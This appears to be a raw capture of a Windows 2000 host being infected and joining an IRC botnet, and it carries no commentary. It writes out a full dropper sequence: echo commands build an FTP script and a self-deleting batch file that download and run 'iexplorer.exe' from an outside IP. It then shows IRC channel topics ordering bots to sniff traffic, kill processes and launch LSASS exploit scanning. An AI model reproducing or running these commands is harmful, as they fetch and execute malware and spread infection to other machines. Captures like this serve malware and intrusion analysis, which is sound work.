Client: echo open 60.254.213.143 5504>.pif C:\\\\WINNT\\\\system32>


VICTIM:  	Microsoft Windows 2000 [Version 5.00.2195] 
VICTIM:  	(C) Copyright 1985-2000 Microsoft Corp.C:\\WINNT\\system32> 
VICTIM:  	echo open 60.254.213.143 5504>.pif C:\\WINNT\\system32> 
VICTIM:  	echo user a a>>.pif C:\\WINNT\\system32> 
VICTIM:  	echo binary>>.pif C:\\WINNT\\system32> 
VICTIM:  	echo GET iexplorer.exe>>.pif C:\\WINNT\\system32> 
VICTIM:  	echo bye>>.pif C:\\WINNT\\system32> 
VICTIM:  	echo @echo off >c.batC:\\WINNT\\system32> 
VICTIM:  	echo ftp -n -v -s:.pif >>c.batC:\\WINNT\\system32> 
VICTIM:  	echo iexplorer.exe >>c.batC:\\WINNT\\system32> 
VICTIM:  	echo del .pif >>c.batC:\\WINNT\\system32> 
VICTIM:  	echo del /F c.bat >>c.batC:\\WINNT\\system32> 
VICTIM:  	echo exit /y >>c.batC:\\WINNT\\system32> 
ATTACKER:	220  
VICTIM:  	USER a 
ATTACKER:	331  
VICTIM:  	PASS a 
ATTACKER:	230  
VICTIM:  	TYPE I 
ATTACKER:	200  
VICTIM:  	PORT 192,168,1,186,4 
ATTACKER:	200  
ATTACKER:	RETR iexplorer.exe 
ATTACKER:	150  
ATTACKER:	226  
VICTIM:  	QUIT 
ATTACKER:	221  
VICTIM:  	NICK `ackaakkmUSER `ackaakkm 0 0 :`ackaakkm 
ATTACKER:	:aaa.18083.com 001 `ackaakkm :time, `ackaakkm!~ackaakkm@192.168.1.186:aaa.18083.com 005 `ackaakkm MAP KNOCK SAFELIST HCN MAXCHANNELS=500 MAXBANS=60 NICKLEN=30 TOPICLEN=307 KICKLEN=307 MAXTARGETS=15 AWAYLEN=307 :are supported by this server:aaa.18083.com 005 `ackaakkm WALLCHOPS WATCH=128 SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=be,kfL,l,psmntirRcOAQKVGCuzNSMT NETWORK=time CASEMAPPING=ascii EXTBAN=~,cqr :are supported by this server:aaa.18083.com 422 `ackaakkm :MOTD File is missing:`ackaakkm MODE `ackaakkm :+i 
VICTIM:  	JOIN #.has hs 
ATTACKER:	:`ackaakkm!~ackaakkm@192.168.1.186 JOIN :#.has:aaa.18083.com 332 `ackaakkm #.has :.join #.k |`sniff.on -s |`adv.start lsass 100 3 0 x.x.x.x -r -s |`i.join #.sd:aaa.18083.com 333 `ackaakkm #.has Hs 1218276621:aaa.18083.com 353 `ackaakkm @ #.has :`ackaakkm @Hs :aaa.18083.com 366 `ackaakkm #.has :End of /NAMES list. 
VICTIM:  	USERHOST `ackaakkmJOIN #.has hsUSERHOST `ackaakkmJOIN #.has hsUSERHOST `ackaakkm 
ATTACKER:	:aaa.18083.com 302 `ackaakkm :`ackaakkm=+~ackaakkm@192.168.1.186    :aaa.18083.com 302 `ackaakkm :`ackaakkm=+~ackaakkm@192.168.1.186    :aaa.18083.com 302 `ackaakkm :`ackaakkm=+~ackaakkm@192.168.1.186     
VICTIM:  	JOIN #.sd  
ATTACKER:	:`ackaakkm!~ackaakkm@192.168.1.186 JOIN :#.sd:aaa.18083.com 332 `ackaakkm #.sd :`sniff.on -s |`pctrl.kill kiss.exe -s |`adv.start lsass 100 3 0 -r -b -s:aaa.18083.com 333 `ackaakkm #.sd Hs 1218276209:aaa.18083.com 353 `ackaakkm @ #.sd :`ackaakkm :aaa.18083.com 366 `ackaakkm #.sd :End of /NAMES list. 
VICTIM:  	PRIVMSG #.#. :(85.181.131.189:12343)(10.2.32.208:1027) 220    
VICTIM:  	PRIVMSG #.#. :(10.2.32.208:1027)(85.181.131.189:12343) USER a  PRIVMSG #.#. :(10.2.32.208:1027)(85.181.131.189:12343) PASS a   
VICTIM:  	PRIVMSG #.#. :(85.181.131.189:12343)(10.2.32.208:1027) 230    
ATTACKER:	:aaa.18083.com 404 `ackaakkm #.#. :You need voice (+v) (#.#.):aaa.18083.com 404 `ackaakkm #.#. :You need voice (+v) (#.#.):aaa.18083.com 404 `ackaakkm #.#. :You need voice (+v) (#.#.):aaa.18083.com 404 `ackaakkm #.#. :You need voice (+v) (#.#.) 
ATTACKER:	PING :aaa.18083.com 
ATTACKER:	PONG :aaa.18083.com 
VICTIM:  	PRIVMSG #.#. :(125.192.101.68:17441)(10.2.32.201:1074) 220    
VICTIM:  	PRIVMSG #.#. :(10.2.32.201:1074)(125.192.101.68:17441) USER a  PRIVMSG #.#. :(10.2.32.201:1074)(125.192.101.68:17441) PASS a   
VICTIM:  	PRIVMSG #.#. :(125.192.101.68:17441)(10.2.32.201:1074) 230    
ATTACKER:	:aaa.18083.com 404 `ackaakkm #.#. :You need voice (+v) (#.#.):aaa.18083.com 404 `ackaakkm #.#. :You need voice (+v) (#.#.):aaa.18083.com 404 `ackaakkm #.#. :You need voice (+v) (#.#.):aaa.18083.com 404 `ackaakkm #.#. :You need voice (+v) (#.#.) 
VICTIM:  	PRIVMSG #.#. :(121.2.10.178:13397)(10.2.32.205:1027) 220    
ATTACKER:	:aaa.18083.com 404 `ackaakkm #.#. :You need voice (+v) (#.#.) 
VICTIM:  	PRIVMSG #.#. :(10.2.32.205:1027)(121.2.10.178:13397) USER a   
VICTIM:  	PRIVMSG #.#. :(10.2.32.205:1027)(121.2.10.178:13397) PASS a  PRIVMSG #.#. :(121.2.10.178:13397)(10.2.32.205:1027) 230    
ATTACKER:	:aaa.18083.com 404 `ackaakkm #.#. :You need voice (+v) (#.#.):aaa.18083.com 404 `ackaakkm #.#. :You need voice (+v) (#.#.):aaa.18083.com 404 `ackaakkm #.#. :You need voice (+v) (#.#.) 
ATTACKER:	PING :aaa.18083.com 
ATTACKER:	PONG :aaa.18083.com 
ATTACKER:	PONG :aaa.18083.com